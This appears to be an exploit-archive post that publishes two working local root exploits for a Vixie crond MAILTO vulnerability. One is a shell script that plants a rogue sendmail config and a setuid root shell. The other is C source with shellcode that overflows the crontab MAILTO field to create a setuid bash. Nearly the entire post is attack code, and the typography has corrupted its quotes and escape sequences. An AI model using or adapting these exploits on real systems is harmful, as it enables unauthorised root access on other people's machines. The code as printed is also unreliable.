‘Two new exploit scripts released for Vixie CronD vulnerability’

Summary

‘The following two programs can be used to verify whether your CronD is vulnerable to the latest vulnerability that allows local users to gain root privileges. For more details about this vulnerability see our article: Buffer overflow in crond

Credit:

‘The first exploit code has been provided by: Michal Zalewski.
The second exploit code has been provided by: jbowie@el8.org


Details

‘This first exploit script, is a simple Perl Script:

#!/bin/sh

clear
echo ‘——————————————————————‘
echo ‘Marchew Hyperreal Industries <marchew@dione.ids.pl>’
echo ‘Stumilowy Las Team <100milowy@gdynia.ids.pl>’
echo ‘—————————- presents —————————-‘
echo
echo ‘ -= vixie-cron root sploit by Michal Zalewski <lcamtuf@ids.pl> =-‘
echo
echo ‘[+] Checking dependencies:’
echo -n ‘ [*] vixie crontab: ‘

if [ -u /usr/bin/crontab -a -x /usr/bin/crontab ]; then
echo ‘OK’
else
echo ‘NOT FOUND!’
exit 1
fi

echo -n ‘ [*] Berkeley Sendmail: ‘

if [ -f /usr/sbin/sendmail ]; then
echo ‘OK’
else
echo ‘NOT FOUND!’
exit 1
fi

echo -n ‘ [*] gcc compiler: ‘

if [ -x /usr/bin/gcc ]; then
echo ‘OK’
else
echo ‘NOT FOUND!’
exit 1
fi

echo ‘ [?] Dependiences not verified:’
echo ‘ [*] proper version of vixie crontab’
echo ‘ [*] writable /tmp without noexec/nosuid option’
echo ‘[+] Exploit started.’

echo ‘[+] Setting up .cf file for sendmail…’

cat >/tmp/vixie-cf <<__eof__
V7/Berkeley

O QueueDirectory=/tmp
O DefaultUser=0:0

R$+ $#local $: $1 regular local names

Mlocal, P=/tmp/vixie-root, F=lsDFMAw5:/|@qSPfhn9, S=10/30, R=20/40,
T=DNS/RFC822/X-Unix,
A=vixie-root
__eof__

echo ‘[+] Setting up phase #1 tool (phase #2 tool compiler)…’

cat >/tmp/vixie-root <<__eof__
#!/bin/sh

gcc /tmp/vixie-own3d.c -o /tmp/vixie-own3d
chmod 6755 /tmp/vixie-own3d
__eof__

chmod 755 /tmp/vixie-root

echo ‘[+] Setting up phase #2 tool (rootshell launcher)…’

cat >/tmp/vixie-own3d.c <<__eof__
main() {
setuid(0);
setgid(0);
unlink(‘/tmp/vixie-own3d’);
execl(‘/bin/sh’,’sh’,’-i’,0);
}
__eof__

echo ‘[+] Putting evil crontab entry…’

crontab – <<__eof__
MAILTO=’-C/tmp/vixie-cf dupek’
* * * * * nonexist
__eof__

echo ‘[+] Patience is a virtue… Wait up to 60 seconds.’

ILE=0

echo -n ‘[+] Tick.’

while [ $ILE -lt 50 ]; do
sleep 2
let ILE=ILE+1
test -f /tmp/vixie-own3d && ILE=1000
echo -n ‘.’
done

echo
echo ‘[+] Huh, done. Removing crontab entry…’

crontab -r

echo ‘[+] Removing helper files…’

rm -f /tmp/vixie-own3d.c /tmp/vixie-root /tmp/vixie-cf /tmp/df* /tmp/qf* &>/dev/null

echo ‘[*] And now…’

if [ -f /tmp/vixie-own3d ]; then
echo ‘[+] Entering root shell, babe :)’
echo
/tmp/vixie-own3d
echo
else
echo ‘[-] Oops, no root shell found, patched system or configuration problem :(‘
fi

echo ‘[*] Exploit done.’

The second is a C source code:

/*
* VixieCron 3.0 Proof of Concept Exploit – w00w00
*
* Not only does Paul give up root with this one, but with his creative use of
* strtok() he actually ends up putting the address of our shellcode in eip.
*
* Many Thanks: Cheez Wiz, Sangfroid
* Thanks: stran9er, Shok
* Props: attrition.org,mea_culpa,awr,minus,Int29,napster,el8.org,w00w00
* Drops: Vixie, happyhacker.org, antionline.com, <insert your favorite web
* defacement group here>
*
* Hellos: pm,cy,bm,ceh,jm,pf,bh,wjg,spike.
*
* -jbowie@el8.org
*
*/

#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <pwd.h>

char shellcode[] =
‘xebx40x5ex89x76x0cx31xc0x89x46x0bx89xf3xeb’
‘x27w00w00:Ifwewerehackerswedownyourdumbassx8dx4e’
‘x0cx31xd2x89x56x16xb0x0bxcdx80xe8xbbxffxff’
‘xff/tmp/w00w00’;

int
main(int argc,char *argv[])
{
FILE *cfile,*tmpfile;
struct stat sbuf;
struct passwd *pw;
int x;

pw = getpwuid(getuid());

chdir(pw->pw_dir);
cfile = fopen(‘./cronny’,’a+’);
tmpfile = fopen(‘/tmp/w00w00′,’a+’);

fprintf(cfile,’MAILTO=’);
for(x=0;x<96;x++)
fprintf(cfile,’w00w00 ‘);
fprintf(cfile,’%s’,shellcode);
fprintf(cfile,’n* * * * * daten’);
fflush(cfile);

fprintf(tmpfile,’#!/bin/shncp /bin/bash %snchmod 4755 %s/bashn’, pw->pw_dir,pw->pw_dir);
fflush(tmpfile);

fclose(cfile),fclose(tmpfile);

chmod(‘/tmp/w00w00’,S_IXUSR|S_IXGRP|S_IXOTH);

if(!(fork())) {
execl(‘/usr/bin/crontab’,’crontab’,’./cronny’,(char *)0);
} else {
printf(‘Waiting for shell be patient….n’);
for(;;) {
if(!(stat(‘./bash’,&sbuf))) {
break;
} else { sleep(5); }
}
if((fork())) {
printf(‘Thank you for using w00warez!n’);
execl(‘./bash’,’bash’,(char *)0);
} else {
remove(‘/tmp/w00w00’);
sleep(5);
remove(‘./bash’);
remove(‘./cronny’);
execl(‘/usr/bin/crontab’,’crontab’,’-r’,(char *)0);
}
}
}’

Categories: Exploits